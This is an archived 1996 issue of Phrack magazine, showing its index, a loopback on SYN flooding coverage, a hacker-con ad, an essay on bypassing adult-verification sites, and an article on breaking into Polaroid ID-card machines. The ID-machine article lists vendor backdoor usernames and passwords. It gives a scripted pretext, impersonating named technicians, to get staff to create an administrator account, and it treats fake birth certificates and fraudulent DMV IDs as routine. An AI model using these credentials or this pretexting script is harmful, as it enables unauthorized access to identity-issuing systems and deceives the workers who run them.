Phrack #49

EDB-ID:

42860

CVE:

N/A

Author:

phrack

Type:

papers

Platform:

Magazine

Published:

1996-11-08

				.oO Phrack 49 Oo.

			  Volume Seven, Issue Forty-Nine
				     
				      1 of 16

				  Issue 49 Index
			       ____________________

				 P H R A C K   4 9

				 November 08, 1996
			       ____________________


Welcome to the next generation of Phrack magazine.  A kinder, gentler, Phrack.
A seasoned, experienced Phrack.  A tawdry, naughty Phrack.  A corpulent, 
well-fed Phrack.  Phrack for the whole family.  Phrack for the kids, Phrack 
for the adults.  Even Phrack for the those enjoying their golden years.

If you thought 48 was a fluke, here is 49, RIGHT ON SCHEDULE.  Full speed 
ahead, baby.  We promised timely Phrack.  We promised quality Phrack.  Here 
are both in ONE CONVENIENT PACKAGE!  We trimmed the fat to bring you the lean
Phrack.  Chock full of the healthy information you need in your diet.  All 
natural.  No artificial ingredients.  No snake oil.  No placebo effect.  
Phrack is full of everything you want, and nothing you don't.
	
This issue is the first *official* offering from the new editorial staff.  If
you missed them, our prophiles can be found in issue 48.  Speaking of 48, 
what a tumultuous situation article 13 caused.  All that wacking SYN flooding.
Well, it got the job done and my point across.  It got vendors and programmers
working to come up with work-around solutions to this age-old problem.  Until 
recently, SYN-flooding was a skeleton in the closet of security professionals.
It was akin the crazy uncle everyone has, who thinks he is Saint Jerome.  We 
all knew it was there, but we ignored it and kinda hoped it would go away...  
Anyway, after this issue, I hope it *will* just go away.  I have done 
interviews for several magazines about the attack and talked until I was blue 
in the face to masses of people.  I think the word is out, the job is done.  
Enough *is* enough. " SYN_flooding=old_hat; ".  Onto bigger and better things.

A few more quick points (after all, you want Phrack Warez, not babbling 
daemon9).  I want to thank the community for supporting me (and co.) thus far.
Countless people have been quite supportive of the Guild, the Infonexus, and 
of Phrack.  Time and work do permit me to get back to all of you individually,
so just a quick blurb here.  Thank you all.  I will be using Phrack as a tool 
to give back to you, so please mail me (or any of the editors with your 
suggestions).  This is *your* magazine.  I just work here.  

Most of all, I am stoked to be here.  I am giving this my all.  I'm fresh, I'm
ready... I'm hyped + I'm amped (most of my heros don't appear on no stamps..).

Drop us a line on what you think of 49.  Comments are encouraged.


Bottom line (and you *can* quote me on this):  Phrack is BACK.  

	- daemon9

       [ And remember: r00t may own you, but the Guild loves you ]
     [ TNO, on the other hand, doesn't even fucking care you exist ]

---------------------------------------------------------------------------


Enjoy the magazine.  It is for and by the hacking community.  Period.


	  Editors : daemon9, Datastream Cowboy, Voyager
	  Mailboy : Erik Bloodaxe
	    Elite : Nirva (*trust* me on this one)
	   Raided : X (investigated, no charges as of yet)
   Hair Technique : Mycroft, Aleph1
	    Tired : TCP SYN flooding
	    Wired : Not copping silly slogans from played-out, vertigo 
		    inducing magazines.
	Pissed off: ludichrist
	 Pissed on: ip
	     News : DisordeR
	   Thanks : Alhambra, Halflife, Snocrash, Mythrandir, Nihil, jenf,
		    xanax, kamee, t3, sirsyko, mudge. 
       Shout Outs : Major, Cavalier, Presence, A-Flat, Colonel Mustard,
		    Bogus Technician, Merc, Invalid, b_, oof, BioHazard,
		    Grave45, NeTTwerk, Panzer, The Bishop, TeleMonster,
		    Ph0n-E, loadammo, h0trod.

Phrack Magazine V. 7, #49, November 08, 1996.   ISSN 1068-1035
Contents Copyright (c) 1996 Phrack Magazine. All Rights Reserved.
Nothing may be reproduced in whole or in part without written
permission from the editors.  Phrack Magazine is made available 
quarterly to the amateur computer hobbyist free of charge.  
Any corporate, government, legal, or otherwise commercial usage 
or possession (electronic or otherwise) is strictly prohibited without 
prior registration, and is in violation of applicable US Copyright 
laws. To subscribe, send email to phrack@well.com and ask to be 
added to the list.

		    Phrack Magazine
		    603 W. 13th #1A-278              (Phrack Mailing Address)
		    Austin, TX 78701

		    ftp.fc.net                       (Phrack FTP Site)
		    /pub/phrack
		    
		    http://www.fc.net/phrack         (Phrack WWW Home Page)
		    
		    phrack@well.com                  (Phrack E-mail Address)
		    or phrackmag on America Online
		    
Submissions to the above email address may be encrypted
with the following key (note this is a NEW key): 

-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.6.2

mQENAzJuWJgAAAEH/2auap+FzX1AZOsQRPWRrRSOai2ZokfVpWWJI8DRuSpX9l7w
5qWHrZdL/RweA4lgwAmcrAOD6d8+AzZfXEhkKi92G9ZNy2cjsb5g7oamkcPmC03h
pdhRe5rHXDWUtXDEhHlkV0WvkLXrhFijW2VdJ2UDFyFd8q0nBSIz+JTGneNO0w4q
aowCx3gZpEb4hkEU1LFoJXywZhnBg06jSxD9exbBF2WKeealqTlntlcsMmeJ3OdS
9fqnGI19BWirqkIJYtNXdzP4M2usOEvikrdhXwSbCNcDGcY6pyKco2rKbBUj5V2I
8/2L0TSGSaRBZ/YKRplwycldy63UVVTLMNGQCCUABRG0KlBocmFjayBNYWdhemlu
ZSA8cGhyYWNrZWRpdEBpbmZvbmV4dXMuY29tPg==
=eHJS
-----END PGP PUBLIC KEY BLOCK-----

	ENCRYPTED SUBSCRIPTION REQUESTS WILL BE IGNORED

Phrack goes out plaintext...  You certainly can subscribe in plaintext


			   .oO Phrack 49 Oo.
		 -------------------------------------
			   Table Of Contents
		
 1. Introduction                                                        7  K
 2. Phrack loopback                                                     6  K
 3. Line Noise                                                          65 K 
 4. Phrack Prophile on Mudge                       by Phrack Staff      8  K
 5. Introduction to Telephony and PBX systems      by Cavalier          100K
 6. Project Loki: ICMP Tunneling                   by daemon9/alhambra  10 K 
 7. Project Hades: TCP weaknesses                  by daemon9           38 K
 8. Introduction to CGI and CGI vulnerabilities    by G. Gilliss        12 K
 9. Content-Blind Cancelbot                        by Dr. Dimitri Vulis 40 K
10. A Steganography Improvement Proposal           by cjm1              6  K
11. South Western Bell Lineman Work Codes          by Icon              18 K 
12. Introduction to the FedLine software system    by Parmaster         19 K
13. Telephone Company Customer Applications        by Voyager           38 K
14. Smashing The Stack For Fun And Profit          by Aleph1            66 K
15. TCP port Stealth Scanning                      by Uriel             32 K
16. Phrack World News                              by Disorder          109K

									575k
		 -------------------------------------

"...There's MORE than maybes..."

	- Tom Regean (Gabriel Bryne) "Miller's Crossing"
	[ Obviously referring to the blatent truism that Phrack IS back ]

"...Fuckin' Cops..."

	- Verbal Kint/Keyser Soze (Kevin Spacey) "The Usual Suspects"
	[ Not sure what was meant by that.. ]

"Got more funky styles than my Laserjet got fonts"
	- 311/Grassroots "Omaha Stylee"
	[ That would be referring to us, of course ]

EOF



--------------------------------------------------------------------------------


                             .oO Phrack Magazine Oo.

                   	 Volume Seven, Issue Forty-Nine
	   	 		   
  				  File 2 of 16

                                Phrack Loopback

-----------------------------------------------------------------------------
[The Netly News]

     September 30, 1996

     Today, Berkeley Software Design, Inc. is expected to publicly release 
a near-perfect solution to the "Denial of Service," or SYN flooding attacks,
that have been plaguing the Net for the past three weeks. The fix, dubbed
the SYN cache, does not replace the need for router filtering, but it is 
an easy-to-implement prophylaxis for most attacks.
	
	"It may even be overkill," says Alexis Rosen, the owner of Public 
Access Networks. The attack on his service two weeks ago first catapulted 
the hack into public consciousness.

	The SYN attack, originally published by Daemon9 in Phrack, has 
affected at least three service providers since it was published last month. 
The attack floods an ISP's server with bogus, randomly generated connection
requests. Unable to bear the pressure, servers grind to a halt.

	The new code, which should take just 30 minutes for a service provider 
to install, would keep the bogus addresses out of the main queue by saving two 
key pieces of information in a separate area of the machine, implementing
communication only when the connection has been verified.  Rosen, a master of 
techno metaphor, compares it to a customs check. When you seek entrance to a 
server, you are asked for two small pieces of identification. The server then
sends a communique back to your machine and establishes that you are a real 
person. Once your identity is established, the server grabs the two missing 
pieces of identification and puts you into the queue for a connection. If 
valid identification is not established, you never reach the queue and the 
two small pieces of identification are flushed from the system.

	The entire process takes microseconds to complete and uses just a few 
bytes of memory. "Right now one of these guys could be on the end of a 300-baud
modem and shut you down," says Doug Urner, a spokesman for BSDI. "With these
fixes, they just won't matter." still, Urner stresses that the solution does 
not reduce the need for service providers to filter IP addresses at the router.

	Indeed, if an attacker were using a T1 to send thousands of requests per
second, even the BSDI solution would be taxed. For that reason, the developers 
put in an added layer of protection to their code that would randomly drop 
connections during an overload. That way at least some valid users would 
be able to get through, albeit slowly.

	There have been a number of proposed solutions based on the random-drop 
theory. Even Daemon9 came up with a solution that looks for any common 
characteristics in the attack and learns to drop that set of addresses.  For 
example, most SYN attacks have a tempo -- packets are often sent in 
five-millisecond intervals -- When a server senses flooding it looks for these 
common characteristics and decides to drop that set of requests. Some valid 
users would be dropped in the process, but the server would have effectively 
saved itself from a total lockup.

	Phrack editor Daemon9 defends his act of publishing the code for the 
attack as a necessary evil. "If I just put out a white paper, no one is 
going to look at this, no one is going to fix this hole," he told The 
Netly News. "You have to break some eggs, I guess.

	To his credit, Daemon9 actually included measures in his code that made
it difficult for any anklebiting hacker to run. Essential bits of information 
required to enable the SYN attack code could be learned only from reading 
the entire whitepaper he wrote describing the attack. Also, anyone wanting to 
run the hack would have to set up a server in order to generate the IP 
addresses.  "My line of thinking is that if you know how to set a Linux up 
and you're enough in computers, you'll have enough respect not to do this," 
Daemon9 says. He adds, "I did not foresee such a large response to this."

	Daemon9 also warns that there are other, similar protocols that can be 
abused and that until there is a new generation of TCP/IP the Net will be open 
to abuse. He explained a devastating attack similar to SYN called ICMP Echo 
Flood.  The attack sends "ping" requests to a remote machine hundreds of times 
per second until the machine is flooded.

	"Don't get me wrong," says Daemon9. "I love the Net. It's my bread and 
butter, my backyard. But now there are too many people on it with no concern 
for security. The CIA and DOJ attacks were waiting to happen. These holes were
pathetically well-known."

                                --By Noah Robischon

[ Hmm.  I thought quotation marks were indicative of verbatim quotes.  Not
in this case...  It's funny.  You talk to these guys for hours, you *think*
you've pounded the subject matter into their brains well enough for them to 
*at least* quote you properly... -d9 ]

[ Ok.  Loopback was weak this time.  We had no mail.  We need mail.  Send us 
mail! ]


			        ----<>----



--------------------------------------------------------------------------------


                        .oO Phrack Magazine Oo.

              	     Volume Seven, Issue Forty-Nine
			
			      File 3 of 16

                           //   //  /   //   ====
                          //   //  //\ //   ====
                         ==== //  //  \/   ====

                     /   //  // \    //  /===   ====
                    //\ //  //   //  //   =   ====
                   //  \/    \ //  //   ===/  ====

------------------------------------------------------------------------------

     CUERVOCON 96 CUERVOCON 96 CUERVOCON 96 CUERVOCON 96 CUERVOCON 96

                  Tengo que hable con mi abogado.

     ----------------------------------------------------------------

What : A computer/telephony/security conference. (show this part to your 
       boss.)

Where: Fort Brown Hotel, Brownsville Texas. 

When : 28 & 29 December, 1996

Who  : The usual gang of cretins.

Why  : It's winter, and it is 12 degrees outside.  The dumpsters are frozen
       shut, and there are icicles on the payphones.  Brownsville is at the
       Southern-most tip of Texas, right up against...Mexico.  Yes, Mexico,
       land of cheap cerveza, four-dollar strippers, and liberal drinking
       laws.  Mexico, where you too can own your very own Federal law
       enforcement official for a fistful of pesos.

     ----------------------------------------------------------------
                              
                              Speakers

Anybody wishing to speak at CuervoCon should send 
e-mail to the address at the bottom of this announcement.
Currently the list includes:
u4ea (by teleconfrence)
Major
ReDragon
Caffiend (about her Breasts)
daemon9 (about his Breasts)

     ----------------------------------------------------------------

                               Events

"How Much Can You Drink?"
"Fool The Lamer"
"Hack The Stripper"
"Hack The Web Server"
"sk00l"
"Ouija Board Hacking"

...as well as a variety of Technical Presentations.


     ----------------------------------------------------------------


                         General Information


The Fort Brown Hotel will have available to us, 125 rooms at the holiday in @ 
$55 a room, and $75 rooms at the ramada @ $45 each.  The Fort Brown was 
previously an actual fort when it was closed down by Uncle Sam.  It became one
large hotel until it was recently purchased and split into the Holiday Inn and
the Ramada.  The Fort Brown was chosen because it is across the street from 
the bridge to Mexico.  You can call the Fort Brown Ramada at: 

	210-541-2921

You can call the Fort Brown Holiday Inn at:

	210-546-2201

Call for reservations, make sure to tell them your with CuervoCon.

Friday and Saturday the con will be in the 'Calvary' room.  While Sunday we 
have the 'Fortress Room' where all the big speakers will be.  Friday and 
Saturday we will have a few speakers and activities.  Friday Night mainly, 
so we can have people arrive on time.  We hope to have the con room open 24 
hours a day.

Brownsville is right on the Mexican border, adjacent to the Mexican town
Matamoris.  The Gulf of Mexico is 25 miles away.  Brownsville has a population
just over 100,000.  The police force includes 175 officers, and a wide variety
of federal law enforcement agencies have a strong presence there as well.
The climate is semi-tropical, and the RBOC is SouthWestern Bell.

Matamoris is the other half of brownsville.  Home of over 1/2 a million 
people, it is known since the early 1900's as a pit of sin.  The federale's 
are not to be fucked with and it is serviced by TelMex.  It is known for its 
bars, strip clubs and mexican food.  Matamoros also has an airport incase 
you live in Mexico and care to go, via aeromexico.

Directions:
In Texas Driving - Go anyway you can to get to US 77 South. Take 77 South 
till it ends in Brownsville. From there you will turn right on International.
Proceed all the way down international, right before the bridge, turn left.
The Fort Brown will be on the left.

For those flying in - We are going to try to have a shuttle going. Also just
tell the cab driver, Fort Brown.

The Con Registration Fee, aka the pay it when you walk in our we will beat you
up, is only 10$ and an additional 5$ for the 'I paid for eliteness sticker' 
which will let you into the special events, such as hack the stripper.

     ----------------------------------------------------------------

                       Celebrity Endorsements



Here's what last years participants had to say about CuervoCon:

"I attended the CuervoCon 95.  I found many people there who, fearing a
 sunburn, wanted to buy my t-shirts!" -ErikB

"I tried to attend, but was thwarted by "No Admittance to The Public" 
 sign.  I feel as though I missed the event of the year." - The Public

"mmmm...look at all the little Mexican boys..." -Netta Gilboa

"Wow!  CuervoCon 95 was more fun that spilling my guts to the feds!" - 
 Panther Modern

"CuervoCon is our favorite annual event.  We know we can give 
 security a day of rest, because you people are all too drunk to
 give us any trouble..." - AT&T

"No moleste, por favor." - TeleMex

Don't miss it!

     ----------------------------------------------------------------


Have you ever hacked a machine in your hometown from a foreign
country?

Have you ever had to convert dollars into pesos to get your bribe right?

Have you ever spent time in a foreign prison, where your "rights as an 
American" just don't apply?

Have you ever been taken down for soemthing that wasn't even illegal 
half an hour ago?

YOU WILL!  And the con that will bring it to you?

CUERVOCON 96

     ----------------------------------------------------------------

     CUERVOCON 96 CUERVOCON 96 CUERVOCON 96 CUERVOCON 96 CUERVOCON 96 
                            brought to you by
     - S.o.B. - TNo - PLA - Phrack - The Guild - F.U.C.K. - SotMESC - 


                          Contact Information

info@cuervocon.org

www.cuervocon.org - Look here for updates.

Voice mail system coming up soon.

     ----------------------------------------------------------------


                                ----<>----


*** The truth behind the Adult Verification Services 

	     ('porno' will set you free)

*** By your passively skeptical author, t3.

*** 10.30.96


        Let's speak for a minute about 'porno'.  'Porno' has saturated the 
Net to a level in which it's difficult *not* to see it, regardless if 
you're looking for it.  It can be found on the largest web site and the 
smallest ftp site.  It can be found on Usenet, it can be found with any 
one of numerous search engines.  Let's not delude ourselves, porno is 
*everywhere* and anyone with the motor skills to click a mouse can have access 
to it.

About a year ago a concept came along called 'Adult Verification'.  This first
started out by people writing crude cgi scripts that would query every person
as to their age.  'Are you 18' it would say, and even a sexually aware 9-year
old would know to say 'yay' to this.

Soon thereafter, someone topped this 4-line piece of code by writing a login 
interface, most likely it was incorporated into Netscape or some other, less
worthy browser.  This program made use of the actual browser to authenticate   
users.  Of course one needed a login and password, of which had to be manually
added after ample proof of age was received.  If one merely wanted to 
cover one's ass, this would not be a logical solution.

This all occurred during which the CDA (Communications Decency Act) had 
actually existed.  On June 7, 1995, the CDA was passed through the Senate 
to the President, signed, and made a law:

(1) in the heading by striking `Broadcasting obscene
              language' and inserting `Utterance of indecent or profane
              language by radio communication; transmission to minor of
              indecent material from remote computer facility, electronic
              communications service, or electronic bulletin board service';

et al...Now it was illegal to transmit 'indecent material' on the 
Internet.  If this were to actually be adhered to, the Net would shrink 
so drastically that the current topology would last ten years before 
needing an upgrade.

Is was soon apparent that this act was not going to fly.  Groups like the 
EFF and the ACLU suddenly became extremely busy.  Companies such as Apple 
and Microsoft challenged the constitutionality of such a law and took 
this directly to court.  It was also apparent that the transmission of 
'indecent material' would not disappear, but merely go further underground.

Indeed, this is exactly what happened.  Soon thereafter Adult Verification
services began popping up.  AVS (Adult Verification Services), Adultcheck,
Adultpass, and a slew of others came up with an idea.

The idea was to verify a person's adult status by acquiring one's credit 
card number.  This would, ahem, without a doubt, prove that the individual
was 18.  Why?  Because you had to be 18 to have a credit card of course!
Someone obviously didn't take into consideration the five or so million 
pre-adults that would make it their goal to surpass such shotty 
authentication.

It began by the government stating that a credit card is a legal means of 
verifying one's age, this allowing those distributing 'porno'graphic 
materials to continue distributing to those 18 and over.  The initial 
means that the 'providers of porn' used to do this was to basically 
verify the format of the card and not actually run a check on it.  As 
most of us all know, there have been plenty of "Credit Card Generators" 
produced in the last five years, quite capable of fooling these shotty 
authentication systems.

As this authentication was obviously lacking in the "authentication" 
part, the next step was to actually validate the cards.  This began and 
ended nearly as quickly, for finding a credit card (for example, in 
mommy's purse), junior could peruse porn until his dick grew red and chafed.

On June 12, 1996 it was was determined that the CDA indeed violated one's 
constitutional rights and was striken down as a law.  More on this at 
<http://www.eff.org/pub/Legal/Cases/EFF_ACLU_v_DoJ/>.

But it didn't seem to phase the Authentication services.  

The Authentication Services currently verify age by obtaining a credit 
card, verifying it, and actually charging a fee for the service.  About 
$9.95 for two years which entitles you to an abundance of graphic, ad, 
and airbrush-laden web pages and images.  This most likely sufficiently 
scared off the less determined of minors because now they'd be engaging in 
credit card fraud.  

It's truly odd that after it has been deemed legal to distribute said 
porn, that all of these services still insist that it's illegal to do 
so.  Let us realize that Usenet barely flinched when the CDA was in 
effect, and still offered gigs upon (glorious) gigs of nude bodies to 
oggle at.

After taking a good look at this whole bizarre operation, I have made a 
few conclusions of my own.  

Charging $9.95 for two years of access to 'porno'graphy seems a little too 
good to be true.  One must realize that there is a charge to the billing 
company for each credit card transaction made.  I'd be surprised if it 
wasn't half of this ten bucks.  These authentication companies also pay 
"handsomely" the purveyors of porn.  In order for such a service to 
function, obviously there needs to be an agreement with the distributor and the 
authenticator.

Now, one that distributes 'porno'graphy on the Net will certainly not feel 
the need to do these Verification Services any favors.  The majority of 
people that do run these explicit sites are certainly not interested in 
supporting censorship of their material (probably 90% money-making).  The 
AVS's knew this and offered a stipend to those using their services.

The AVS's currently work by paying the site that contains 'indecent 
material' a certain amount each time that site gets another person to 
sign up with their service.  This works by the AVS sending html that is 
put on a verification page.  If one finds this page important enough, 
they may be convinced to sign up with the service that allows you to 
access it.  

The stipend is generally around $4.00, and as high as $7.50.  There are 
many AVS's, and the majority of the said 'sites' use more than one, 
sometimes all of them for verification.  If a particular site uses one 
AVS exclusively, the AVS will pay on the highest end of their scale for new 
recruits.

If we get into some simple math, we may find some contradictions 
regarding this.  The initial fee to those interested in accessing porn is 
$9.95.  Out of these we can safely say that more than $3.00 goes to 
simply checking the validity of the card and billing it.  This leaves the 
AVS with $6.95.

Now, on the receiving end we have a very minimum of $4.00 going towards 
each new person that signs up.  It's probably safe to say that over 90% 
of new customers to these AVS's sign-up through 'porno'graphic pages and 
not directly from the site itself.

So $9.95 ends up being $6.95 after expenses, and then the service sends 
another $4.00 to the person that gave them the account.  This leaves the 
AVS with a maximum of $2.95 total.

The costs running an AVS are surely not exorbant, but are certainly not 
cheap.  I have yet to find an AVS running off of anything less than at T1 
(1.544mbit) speeds.  This translates to an extreme minimum of 1k/month.  
If you include employees, office space, and incidentals, running any such 
service couldn't cost less than 5k a month at the very least.  This would 
mean to break even one would have to bring in:

5000/2.95

1694 new customers a month, simply to break even!  That's a lot 
considering the membership lasts for two years.  And this is in the 
*best-case* scenario.  I would be hard-pressed to believe that one such 
service could steadily rely on such a base of new clients every month 
indefinitely!

I have theorized that these services are in fact not self-run moneymaking 
ventures, but are actually being funded by a higher authority.  It's 
quite feasible to believe that the government, having been challenged and 
beat, have actually allocated funds to protecting the minors of the Net 
from obscenity.  It's *certainly* not far-fetched, especially with Al 
Gore (think, Tipper) in an improperly high position.

The government could allocate a comparitively paltry sum of one million a 
year towards funding (even creating) companies that act merely to pay 
people to be complacent.  What if the government merely let relatively 
computer proficient professionals bid on forming these AVS's?  What if?

Well, unless i'm overlooking something, I can't see too much illogic to 
my theory.

Another consideration of these services is that even at their current 
state, they are extremely easy to overcome.  So easy, in fact, that their 
existence will hardly offer much resistance to a horny teenager.  Remember, 
people will do anything to get 'porno'graphy.

Such holes in these systems are that the verified member of such an AVS 
connects to a sexually explicit site, is bounced backed to the AVS for 
authentication, and is then bounced back again to the page (url) that 
contains the "naughty stuff".  This page can be simply bookmarked and 
distributed to anyone and their Mom.

Why?  All the services I've come across (the largest ones) do not 
authenticate the target url, they target the initial "warning" page and 
contain information to pass the user on to the naughty stuff.  Thus if 
one single person can obtain the target url, he can bypass all future 
authentication and can as well pass the url on through various channels, 
quite easily ending up in the hands of a minor.

As well, if stupidity was a metaphor for AVS's, most of the target url's 
have filenames such as "warning.html" or "granted.html".  Any 
half-respectable search engine (such as AltaVista) is capable of snarfing 
out such information.  Doubly-so because these services will obviously 
want to advertise their existence.

The only method that seems to partially protect minors from 'porno'graphy 
is the method of installing client-based software such as SurfWatch that 
try to censor 'porno'graphy.  This, as well, relies on a willing company or 
individual to operate.  This works quite archaically by imbedding META 
tags in html source. For example:

<META name="description" content="Validate Age Verification 
Service"><meta name="keywords" content="sex erotica nude porn penthouse 
pornography erotic porno adult playboy dating marriage love date age 
validate validation protect children kids money commercial wealth nudes 
pics jpg gif">

This particular tag would be placed in the receiving html of a 
co-operative service or individual.  The client-based software would 
search for such tags and censor the content accordingly.  From my 
understanding, those using AVS's are not required to embed these tags in 
their "warning" page html.  If they do not, which I would imagine many 
probably wouldn't, then suddenly these client-based censorship tools are 
rendered useless.

So in conclusion, I would give a big thumbs-down for this whole pathetic 
means of controlling freedom.  The Internet was meant to be a place to 
free exchange of information.  Today a minor is just as able to find 
explicit material on the Net as he/she is able to dig through Mom and 
Dad's dresser for copies of Hustler.  A minor is just as capable of 
watching R or X-rated movies, stealing a magazine from a store, or even 
buying one.  

It's time to stop using half-assed and crippled ways of protecting kids 
from obscenity on the Net.  If you're a parent and you don't want your 
child to view such 'porno'graphy, then why not do what you're supposed to 
do and discipline the kid.

Lazy fuckers.


t3
.end



                                ----<>----


T.A.C.D Presents...
Hacking ID Machines 
By PiLL

Table Of Contents

I.   What is an ID Machine & who uses them?
II.  Hardware and software of the ID machines
III. Common security of ID Machines
IV.  What to do once you get in
V.   Closing
VI.  Greets


Part One: What is an ID machine and who uses them?

First we will start with the basics. An IDM or ID Machine is exactly
what the name entails.  It is a computer that government and large
companies use to make security badges and ID cards for employees and
visitors. All of the IDM's are DOS based so security, to say the least,
sucks. There are four models of IDM's. The one we will be covering the
most is the latest and greatest: the ID 4000. Also in the family of
IDM's are the 3000, 2000+, and 2000. I have heard of an ID 1000 but I
have yet to see or play with one, so if you find one, tell me. The 2000
is DOS 3.3 so I can imagine that an ID 1000 is even a bigger waste of
time. IDM's are manufactured by a branch of Polaroid entitled Polaroid
Electronic Imaging. If you want more information on IDM's call (800)343-5000
and they will send you some general specs.  I will let you know right
off the start that these machines sell for as much as $75,000.00 but the
average price is around $40,000.00. So getting caught crashing one is
NOT a good idea.
 
You are probably wondering what companies use ID machines.  Here is a
brief list. All of the Colorado and Alaska DMV's, The IRS, The FBI, The
U.S. Mint, The Federal Reserve, almost any military branch, Hewlett
Packard, Polaroid, Westinghouse (I wouldn't recommend fucking with them:
for more information on Westinghouse check out the movie Unauthorized Access
available from CDC's home page), and all of the major prisons in the
United States. By now you should be getting ideas of the potential fun
you can have. Not that I would ever use what I know for anything illegal
;)

Part Two: Hardware and Software

I will cover each machine in order but you will probably notice that the
ID4000 will get by far more attention then any other.

Hardware and Software for the 2000+ and 2000 is kind of like teaching
someone about the Apple ][ and how to use Logo so I will try not to bore
you to much with them. The 2000 series are unique to the others because
they are one full unit. The hardware is basically a really cheesy
oversized case with a 9 monochrome monitor, a 3 monitor for viewing the
victim of the hideous picture it takes, a 286 Wyse computer with 1meg of
RAM (really hauls ass), a data compression board, image processing board
(*Paris* Board), a signature scanner, a color film recorder or CFR, a
WORM Drive, a modem, and most of the time a network card so the data can
be stored on a mainframe. The Software of the 2000 series is a really
neat database program running under DOS 3.3. If you have never heard of
or used EDLIN, I would not recommend playing with a 2000. The only major
differences between an ID2000 and an ID2000+ is that the computer on the
2000+ is a HP Vectra 386 with 4megs and a SCSI Interface. That's all you
really need to know you probably won't ever encounter one unless you go
trashing a lot.

The ID3000 is also an HP 386/20 but uses DOS 5.0 and a Matrox Digital
Processing board instead of the old Paris board of the 2000 series.

This came about when your state ID actually started to remotely resemble
you in 1992. Also in the 3000 years their were more peripherals
available such as the latest CFR at the time (I think it was the 5000),
PVC printers, and bar code label printers.  The software is basically
DOS 5.0 but this time they use a database shell much like DOSSHELL as
the interface with the machine. The 3000 uses SYTOS for data storage and
transfer and it is best to dial in using a program called Carbon Copy.

The 4000 is the best even though it's not that great. It was is the
first IDM in the Polaroid line that let the customer customize the
machine to their needs.  This is the machine that you see when you go to
the DMV, at least in Denver.  It consists of a JVC camera, a Matrox
processing board, a data compression board, an Adaptec 1505 SCSI card, a
14.4 modem, a network card, and can have any of the following added to
it: a PVC printer (in case you didn't know that's what they use on
credit cards), a magnetic stripe encoder, a bar code printer, a thermal
printer, a CFR (usually the HR6000 like at the DMV), a Ci500 scanner,
and signature pad, a finger print pad (interesting note if you have a
black light and one of the new Colorado Driver licenses hold it under a
black light and look what appears under your picture, you should see
your finger print), and a laminator. Now some of you are thinking what
about the holograms? Those are actually in the lamination, not on the
badge itself. To obtain lamination walk into the DMV and look to the
right or left of the machine if you see a little brown box that's what
you need, but please remember to leave some for the rest of us that
might be next in line. Or you can go to Eagle hardware and buy a bolt
cutter for the dumpster but that's a different text file.

The 4000 runs DOS 6.0 and Windows 3.1. The actual software for the 4000
is a terrible Visual Basic shell that reminds me of the first time I ran
that program AoHell. The only difference is that AoHell did what it was
suppose to, the 4000 software is a headache of GPF's , Environment
Errors, and Vbrun errors. A nice feature that the 4000 has that the
other IDM's don't, is the ability to create and design your own badge.
You can even do it remotely ! ! =) . Unfortunately the program Polaroid
developed for this makes paintbrush look good. But on a bright note you
can import Images.

Briefly here is a run down of what exactly happens when you get your
picture taken on an ID4000 at the DMV. At the first desk or table the
narrow eyed, overpaid, government employee will ask you for some general
information like a birth certificate, picture ID, name, address, SSN#, what
party you prefer to vote for, and whether or not you want to donate your
organs in the event of your untimely demise. You reply by handing her
your fake birth certificate and ID that you had printed no more then an
hour ago, hoping the ink is dry. "My name is Lee Taxor I reside at
38.250.25.1 Root Ave in the Beautiful Port apartments #23 located in
Telnet, Colorado, I prefer to vote for Mickey Mouse of the Disney party,
and can't donate my organs because Satan already owns them." The
disgruntled employee then enters all your information in the correct fields
while never taking an eye off you in fear that you know more about the
machine he or she is using then they do (perhaps you shouldn't of worn
your Coed Naked Hacking T-shirt that you bought at DefCon 4). As soon as
the bureaucrat hits <ENTER> all of the information is sent to a database
located in the directory named after the computer (i.e.
c:ID4000ColoDMV96DMV.MDB). Then you are directed to the blue screen
where you stare at the JVC monitor trying to look cool even though the
camera always seems to catch you when you have to blink or yawn or even
sneeze. *SNAP* the picture is taken and displayed on the monitor where
the employee can laugh at your dumb expression before printing it. If
the employee decides to print the picture it is saved as a 9 digit
number associated with your database record. The 4000 then compresses
the picture and saves it. So the next time you go in and the pull up
your record it will automatically find the associated picture and
display it on the screen. But in the mean time you grab your fake ID the
DMV just made for you and leave happy.

In a nut shell that's all there is to these machines.

Part Three:  Security

I think a better topic is lack of security.  I have yet to see any of
these machines that are remotely secure. Before we go any further the
4000 is best accessed using CloseUp the others using Carbon Copy, But
any mainstream communications program will more then likely work. You
Dial and it asks you right away for a username and password. whoa, stop,
road block right their. Unless of course you know the backdoor that
Polaroid put in their machines so they can service them. =)

ID4000
Login: CSD (case Sensitive)
Password: POLAROID (who would of guessed?)
 
ID3000
Login: CPS
Password: POLAROID (god these guys are so efficient)

ID2000+ And ID2000
Login: POLAROID  (ahh the good old days)
Password: POLAROID

Now if these do not work because they have been edited out, there are
still a few VERY simple ways of getting in to your victims system. The
first is to go with every hackers default method of social engineering.
The best way to do this is to call them up and say "Hi this is (insert
tech name here) with Polaroid Electronic Imaging! How is it going down
there at (name of company)."  The say "pretty good!" in a funny voice
thinking what great customer support. You say "How is the weather been
in (location of company)" they reply with the current weather status
feeling that they can trust you cause you are so friendly. You say "well
(name of person), we were going through our contacts one by one doing
routine upgrades and system cleaning to ensure that your database is not
going to get corrupted anytime soon and that everything is doing what it
is supposed too, if you know what I mean (name of person)." Now they
reply "oh yeah" and laugh with you not having a clue of what you are
talking about. And they then say "well everything seems to be in order."
You say "great sounds good but old *Bob* would have my head if I didn't
check that out for myself." Then you ask if the modem is plugged in and
wait for the reply. The either say yes or no then you ask them go plug
it & give you the number or just give you the number. Then they comply
cause they are just sheep in your plan. You say "Hey thanks (name) one
more thing would happen to know if user CSD:Polaroid exists or did you
guys delete it." If they deleted it ask them to put it back in, giving
you administrative access. They probably know how to and will comply. If
they need help have them do the following: Click on the combination lock
icon at the top of the screen. This will bring them to the
administrative screen and they will have the choices of Purge, Reports,
and Passwords. Have them click on passwords. Then have them enter you as
a new user with CSD as your Name and Polaroid as your Password. After
they have done that make sure they give you all the Keys. The keys are
basically access levels like on a BBS. Lets some users do certain things
while others can not. The only key you need is administrative but have
them give you the rest as well.  The other keys are Management and Luser
I think. The keys are located to the left of the user information that they
just entered. Then have them click OK and close the call politely. Ta
da!! Here is a list of Polaroid phone techs but I would not advise using
Bob or Aryia cause their big wigs and nobody ever talks to them.

Senior Techs of Polaroid                                          
Regular Techs
Bob Pentze (manager)                                              
   
Don Bacher
Aryia Bagapour (assistant)                                       
Richard          
Felix Sue                                                         
     
Rick Ward
Jordan Freeman                                                    
   
Dave Webster
 
